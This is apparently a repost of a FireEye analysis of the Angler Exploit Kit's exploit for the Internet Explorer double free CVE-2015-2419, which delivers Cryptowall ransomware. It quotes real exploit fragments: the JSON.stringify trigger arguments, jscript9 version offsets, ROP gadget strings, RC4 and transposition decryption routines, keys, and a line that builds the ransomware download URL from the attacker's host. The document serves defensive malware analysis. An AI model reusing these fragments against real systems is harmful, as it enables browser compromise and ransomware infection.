Monday, August 10, 2015

Fireeye. CVE-2015-2419 Internet Explorer Double-Free in Angler EK

TL; DR
  • CVE-2015-2419 patched in July, 2015
  • CVE-2015-2419 is a double free vulnerability in jscript9’s native JSON APIs
  • Angler added new obfuscation to the exploit. The landing page fetches a stub of keys and data necessary to run the exploit from the server each time it executes. 
  • Browser checks - the stub of information is sent only to vulnerable browsers and is protected with XTEA over modified Diffie-Hellman exchange.
  • Landing page obfuscation - HTML + JS
  • Victim browser will POST JSON to attacker server
  • The shellcode is RC4 encrypted
  • Payload - Cryptowall Ransomware
--------------------------------------------------------------------------------------------------------------------------

Original:

CVE-2015-2419 – Internet Explorer Double-Free in Angler EK

The Angler Exploit Kit (EK) recently added support for an Internet Explorer (IE) vulnerability (CVE-2015-2419) that was patched in July 2015. Quickly exploiting recently patched vulnerabilities is standard for Angler EK authors, but the target has been Adobe Flash Player since the second half of 2014. The exploitation of CVE-2015-2419 marks the second departure from Flash exploits for Angler (the first being the inclusion of CVE-2015-1671 in Silverlight). This may be the result of Adobe’s recent exploit mitigations in Flash Player that prevent attackers from using Vector (and similar) objects to develop their control over corrupted Flash processes. To date, Angler will deliver Flash, IE, and/or Silverlight exploits depending upon the target’s environment.
Angler also added a new obfuscation to its IE exploit. The landing page fetches a stub of keys and data necessary to run the exploit from the server each time it executes. The stub of information is only sent to victims that broadcast vulnerable browsers, and is protected with XTEA over a homebrew Diffie-Hellman.

IE Exploit Delivery Protection using Diffie-Hellman Key Exchange

Angler’s landing page is obfuscated in a mix of HTML and Javascript (JS).  Underneath the first layer of obfuscation, the landing page profiles the environment, selects exploits to launch, and launches the exploits. The IE exploit is further obfuscated, and uses a key sharing (Diffie-Hellman (D-H)) cryptosystem to tailor each attack to an individual victim’s machine. The crypto implementation uses library code from at least jsbn.js (BigInteger implementation in JavaScript), and bears similarities to cryptico.js.
The victim’s browser will POST the following JSON to the attacker’s server. The naming convention follows a typical naming convention for the D-H protocol where g is the base, p is the modulus, and A is (g**a_) mod p (where a_ the victim’s secret exponent that is not transmitted on the wire). There system takes little care in the safety of these values. They are chosen from the cryptographically unsafe Math.random (in a custom and imbalanced way that prefers nibbles 0-9 over a-f), small, and without primality tests. Value v is the result from ScriptEngineBuildNumber(), which identifies the build of jscript9.
{"g":"78ab123a5d20fda81a9420c241a79f4f","A":"268e38c96cf54350d45537fc97c7
d526","p":"3a5d2e4d0b5a2d2a6b7e2d4e3a8e3c5d","v":"17840"}
The attacker responds with a base64 encoded version of the following. B is the attacker’s D-H response ((g**b_) mod p where b_ is the attacker’s secret exponent that is not transmitted). k is an encrypted version of a key used to decrypt B. The attacker generates k by XTEA encrypting a random key with the D-H shared key (s = (A**b_) mod p). The victim XTEA decrypts k, and then XTEA decrypts b.

{"B":"194ff891862b55d9f1cf5ce4a10f7f92","k":"GulSjPCeuXPcH%2BvwrHjzew%3D%3D","b":"liTB9J%2FghlAzk%2Bp9Kgbg0Y85WPNx1N0jP8u7qPuXo…”}

b contains constants for the rest of the exploit (in the appendix in its entirety). The constants are accessed through a couple layers of redirection in the exploit so that anyone performing static analysis of the attack wouldn’t have the complete exploit. They would have the code flow, but none of the constants (e.g., “ur0pqm8kx”, the password to decrypt the shellcode or "stringify" the method name called from JSON).
{"ll":"length","l":"charCodeAt","I":"fromCharCode","Il":"floor","IlI":"random","lI":"str
ingify","lII":"location","II":"host","llI":"number","lll":"ScriptEngineBuildVersion","lIl"
:"ScriptEngineMajorVersion","IIl":"ScriptEngineMinorVersion","Ill":"setInterval","III
":"clearInterval","lIlI":"ur0pqm8kx",…}
Furthermore, attempts to replay the exploit files will fail because the D-H secret key will be lost. A new random D-H g, A, and p will be created, and won't match the old attacker’s response. As a result, the decryption of the D-H shared secret s will be wrong, as will the decryption results of k and b, and the exploit will fail. The most obvious ways to observe the attack are to:
1)     Break the crypto
2)     Break the PRNG
3)     “Do it live”
It is unclear why the attacker chose to protect only the constant values in the exploit instead of the entire exploit. The decision seems like an unnecessary complication.

CVE-2015-2419 Vulnerability Details

CVE-2015-2419 is a double free vulnerability in jscript9’s native JSON APIs that was patched in July withMS15-065. Specifically, the vulnerability exists in the way that JSON.stringify parses deeply nested JSON data as follows. The attacker’s chosen arguments to JSON.stringify are reproduced in their entirety in the appendix.
Il1I4['prototype'].yc =
    function(a) {
        if (!a.ma(!1)) throw new Error(3);
        a.kb(!1);
        a.ib(!1);
        JSON["stringify"](this.Pc, this.uc);
        a.ob(!1);
        CollectGarbage()
    };

Browser Version Validation

This exploit depends on the version of jscript9.dll. In the decoded JSON response above, we can see the key value pairs corresponding to different versions of jscript9.dll
"llIlII:{"17416":4080636,"17496":4080636,"17631":4084748,"17640":4084748,"1
7689":4080652,"17728":4088844,"17801":4088844,"17840":4088840,"17905":40
88840}
We can also confirm the version targeted from the following code section:
try {
             var c = a.D["ScriptEngineMajorVersion"](),
                d = a.D["ScriptEngineMinorVersion"]()
                e = a.D["ScriptEngineBuildVersion"](),
                b = c == 11 && d == 0 && e <= 17905;
        } catch(f) {}
        if (!b) throw new Error(-1, window["ScriptEngineBuildVersion"] ? '' + window["ScriptEngineBuildVersion"]() : '');

Shellcode Decryption Stage

The shellcode is present inside the IE exploit deobfuscated page as RC4 encrypted and base64 encoded. The key to decrypt the shellcode is also fetched from the above decoded JSON response. In our case, the decryption key is: ur0pqm8kx.
The decryption subroutine is mentioned in Appendix II.

Payload Stage

This latest IE exploit is being used to download the Cryptowall ransomware similar to other variants of Angler Exploit Kit observed in the past few months. The payload is downloaded encrypted over the network. The URL to download the payload is fetched as shown below:
url = "http:// + window[location][host] + / + base64_decode(a)";
Here, a is fetched from the above decoded JSON response. In our case, it is xexec.
xexec() is a custom function which uses a key on the exploit kit landing page to decrypt the path from where the payload has to be fetched.
    String['prototype']['xexec'] = function() {
        return decryption_routine(encrypted_path)
encrypted_path is present on the exploit kit landing page.
encrypted_path = 'F1om1GGamPpL2dyVZZs0U9vmNWGZmPEJVbw8Rcy95wymVmWJGZwZVYlZVN9
Rhl03lCGSnZibzahZ1duzU14Td2WcUbWPXT0VBLVmsFpW53mbWauYWenJ9Y0mZ
lFVlVFM0XPV3ThBJPO1I  G 0 Z      tp M 2';
Using the decryption routine mentioned in Appendix I, this decrypts to the following base64 encoded data:
decrypted_path = ZmF0aGVyLm1odG1sP2ZpcmU9ZW8wJmNvbG9yPVRENm5RJmZlZGVyYWw9ZVVw
d3hzSCZhbnl0aGluZz1iLTUmc2V0PUd4TW1VbXBWYWsmb3JnYW5pemF0aW9uPV
Z1MVBhV0lFTFlOX3JPMGI2Z0pt
This base64 decodes to: " father.mhtml?fire=eo0&color=TD6nQ&federal=eUpwxsH&anything=b-5&set=GxMmUmpVak&organization=Vu1PaWIELYN_rO0b6gJm"
This is the path from which payload is served
The payload fetched from above path is encrypted. It will be decrypted using XTEA algorithm by the shellcode. The XTEA key used is present in the deobfuscated HTML page. In our case, it is:Du9JOBgkbfzGvmFF.

Appendix I

Decryption routine to fetch payload path. The key is present on exploit kit landing page.
window["osSnUV"] = new Function ('text', "var cryptKey = key, rawArray = cryptKey.split(''), sortArray = cryptKey.split(''), keyArray=[];sortArray.sort(); var keySize = sortArray.length;for (var i=0; i<keySize; i++) {keyArray."+p+"(rawArray."+i+"(sortArray[i]));}var k = keySize - text.length % keySize;for(var l = 0; l<k;l++) {text += ' ';} var endStr = '', i,j,line,newLine;for (i = 0; i < text.length; i += keySize) {line = text.substr(i,keySize).split('');newLine = '';for (j = 0; j < keySize; j++){newLine += line[keyArray[j]];}endStr = endStr + newLine;}endStr=endStr.replace(/\\s/g,'');return endStr;");

Appendix II

RC4 decryption routine to fetch shellcode:
function DecryptionRoutine(key, encrypted_shellcode) {
            var d = [], e = 0, f, decrypted_shellcode = '';
    for (h = 0; h < 256; h++)
            {
                        d[h] = h;
            }
    for (h = 0; h < 256; h++)
            {
                        e = (e + d[h] + key.charCodeAt(h % key.length)) % 256;
                        f = d[h];
                        d[h] = d[e];
                        d[e] = f;
            }
    for (var k = e = h = 0; k < encrypted_shellcode.length; k++)
            {
                        h = (h + 1) % 256;
                        e = (e + d[h]) % 256;
                        f = d[h];
                        d[h] = d[e];
                        d[e] = f;
                        decrypted_shellcode += String.fromCharCode(encrypted_shellcode.charCodeAt(k) ^ d[(d[h] + d[e]) % 256]);
            }
    return decrypted_shellcode;
}

Appendix III

Contents of the b constant:
{"ll":"length","l":"charCodeAt","I":"fromCharCode","Il":"floor","IlI":"random","lI":"str
ingify","lII":"location","II":"host","llI":"number","lll":"ScriptEngineBuildVersion","lIl"
:"ScriptEngineMajorVersion","IIl":"ScriptEngineMinorVersion","Ill":"setInterval","III
":"clearInterval","lIlI":"ur0pqm8kx”,"IlII":"http://","lllI":/","lIIl":"u","IlIl":"x","llll":"xexec","Illl":"EAX","lIII":"ECX","IIIl":"EDI","IllI":"ESP",
"IIlI":"XCHG EAX,ESP","IIll":"MOV [ECX+0C],EAX","llIl":"CALL [EAX+4C]","llII":"MOV EDI,[EAX+90]","IIII":"a","lIll":"kernel32.dll","lIlll":"virtualprotect","IIIlI":11,"lIIll":0,"l
llll":17905,"lIllI":500,"llIIl":16,"IlIII":0,"IIIll":1,"IIlII":2,"lIlII":3,"IllIl":4,"lllIl":5,
"IIlll":8,"lIlIl":9,"lIIIl":10,"IllII":11,"lIIlI":12,"IlIll":16,"IIIIl":24,"IlIlI":100,"IIIII":1,
"llIlI":2,"lllII":2147483647,"llIll":4294967295,"IIllI":255,"llIII":256,"lIIII":65535,"IIlIl":167
76960,"IlIIl":16777215,"llllI":4294967040,"IlllIl":4294901760,"Illll":4278190080,"IlllI":65280,"l
lllIl":16711680,"lllIlI":19,"llIIII":4096,"IIIIIl":4294963200,"IIlllI":4095,"llIIlI":14598366,
"IIllIl":48,"llIIll":32,"IIIllI":15352,"llIlll":85,"lIIIII":4096,"IllllI":400,"lIIlII":311296000,
"IIIlIl":61440,"llllII":24,"IIIIll":32,"IlIlIl":17239,"lllllI":15,"IllIll":256,"llIllI":76,
"lllIll":144,"lIlIIl":17416,"IlIIll":65536,"IIlIll":100000,"lIlllI":28,"IIlIlI":60,"lIlIII":44,
"IIIlll":28,"IllIII":128,"lllIIl":20,"lIIIll":12,"lIlIlI":16,"IIlIIl":4,"IlIIIl":2,"lIllll":110,
"IIIlII":64,"IllIlI":-1,"lIIIIl":0,"IllIlII":1,"lIIlll":2,"IlIlll":3,"IIlIII":4,"lIllIl":5,"IIllll"
:7,"IIIIII":9,"lIlIll":10,"IlllII":11,"lIllII":12,"Illlll":-2146823286,"lIIIlI":[148,195],"lIIlIl":[137,65,12,195],"IIllII":[122908,122236,125484,2461125,208055,1572649,249826,271042,98055,62564,162095,163090,340146,172265,
163058,170761,258290,166489,245298,172955,82542],"IlIIII":[150104,149432,152680,3202586,214836,3204663,361185,285227,103426,599295,365261,226292,410596,
180980,226276,179716,320389,175621,307381,792144,183476],"IIIIlI":48,"IIIlIlI":57,"lllIII":65,"IllIIl"
:90,"IlIlII":97,"llllll":122,"IlIllI":16640,"llIlIl":23040,"IlIIlI":4259840,"lIIIIlI":5898240,"llIIIl":
1090519040,"llIIIII":1509949440,"IlIIIlI":32,"IIIlllI":8192,"lllllII":2097152,"IIIllll":536870912,"llIlII":{"17416":4080636,"17496":4080636,"17631":4084748,"17640":4084748,"17689":4080652,"17728":4088844,
"17801":4088844,"17840":4088840,"17905":4088840

Appendix IV

Attacker’s chosen arguments to JSON.stringify to exercise CVE-2015-2419:
Pc = {"a0":{"a0":{"a0":{"a0":{"a0":{"a0":{"a0":{"a0":"8HEQ36D4","a1":"7UI7T5FN","a2":"RFM8ORW8","a3":"G50CEWBI","a4":"BL30110U","a5":"AWE8A46R","a6":
"058MT5M1","a7":"QNG7RWBF","a8":"FBQL54XA","a9":"574180FM","a10":"6YCTSRH0","a11":"N0AJ34YX","a12":
"AO7CY3D4","a13":"T5XHR4I0","a14":"784508S8","a15":"4TLC3Q4L","a16":"U7A102Q4","a17":"3466F3UR",
"a18":"356Q7028","a19":"8136URQ8"},"a1":"75C4SKMN","a2":"4LD2OP8P","a3":"UI55N7Y4","a4":"J10L02PV",
"a5":"PEK6K2W7","a6":"U5C1L0YL","a7":"K2YWU745","a8":"J4725E35","a9":"OF1WR0HJ","a10":"505TBO78",
"a11":"W48VSPHX","a12":"X83O3FW0","a13":"U68L8DNA","a14":"187V522Y","a15":"37N768W4","a16":"V66R2D77",
"a17":"85QG6W2E","a18":"81JF5PF7","a19":"7B75IS0S"},"a1":"KBG32EST","a2":"2VN32W7B","a3":"4KT5JVBS",
"a4":"EDPUH4AO","a5":"3A430Q13","a6":"2I5D2250","a7":"41OTHIHR","a8":"CWP0EVCJ","a9":"HLYOGE5X",
"a10":"B3AIE208","a11":"L6AFDY71","a12":"5846CMKV","a13":"3S5DVV2T","a14":"7K5GFF8C","a15":"8YP7WBS2"
,"a16":"5X4EP78P","a17":"88574V1B","a18":"DJ7E8H06","a19":"VG7VN4HY"},"a1":"7P0RT015","a2":"IQPV6IKK",
"a3":"2131VW84","a4":"Y81VNW8D","a5":"TUH60UNR","a6":"52S3R10G","a7":"8J37MCEV","a8":"0737UXB3","a9"
:"6W4HEW6L","a10":"2C182X5P","a11":"K2CJ5VIK","a12":"C5LQLKDA","a13":"L1600HY7","a14":"U0MRETE5","a15"
:"1654VHP0","a16":"1K500GJV","a17":"MI20FAM5","a18":"8V4252VN","a19":"34NQB53F"},"a1":"R88W7ICS","a2"
:"VKC0041R","a3":"I28APIDN","a4":"F7FI27O2","a5":"0N8F1K5S","a6":"L811MVQO","a7":"34DAN88P","a8":
"U0885VRN","a9":"68MPG5T2","a10":"BP55YBYF","a11":"TQT3BWD6","a12":"Y51M3LHU","a13":"FB4P602U","a14"
:"J1N2KO31","a15":"THM817A4","a16":"E4J5A6MH","a17":"L4748S67","a18":"0FELJF2W","a19":"7220PJ14"},
"a1":"4GV2J5RI","a2":"RVA6S111","a3":"X1N0RG08","a4":"EH8013F5","a5":"0BA3XJQT","a6":"H2HX3IJ8",
"a7":"2HC268X4","a8":"015L1E33","a9":"ELO6IGC5","a10":"70KTQ6HM","a11":"1M6IX20K","a12":"X64LGJKK",
"a13":"LBX0KLU7","a14":"5Y8O5731","a15":"6QPRW517","a16":"B1C4PIJ8","a17":"6OS8GCER","a18":"1665C783"
,"a19":"0T08F051"},"a1":"L6U0I741","a2":"UC82L302","a3":"3WYW46B4","a4":"KY1U5C7B","a5":"O3IX8D40",
"a6":"332Q0M74","a7":"7G78UVO7","a8":"6RFVUK6J","a9":"RUCN6WD5","a10":"VLCI7Y3Y","a11":"N04O0IC8",
"a12":"UJGIQ8PG","a13":"IQ3CM3HA","a14":"PD8X1412","a15":"475LEQ6N","a16":"4P57I841","a17":
"0U3F5AS8","a18":"57F7OPCG","a19":"16B8JB47"},"a1":"15LTQ001","a2":"1KHWV333","a3":"2JD25FM5","a4"
:"0BYDYLPW","a5":"NIIV0JT2","a6":"JDL3RW02","a7":"QR3BG505","a8":"MY755QR4","a9":"EXFVX4HK","a10"
:"HP3C3671","a11":"8DC42C1H","a12":"33XW2482","a13":"275B431C","a14":"DQBOT0OX","a15":"VPEC8AK4"
,"a16":"7P8E7VCI","a17":"DVDDFV3J","a18":"U22T484L","a19":"722C31R2"}
uc = function (a, b) {
        return b
    }

Acknowledgements

We would like to thank Aakash Jain for his contributions to this blog.
Web Analytics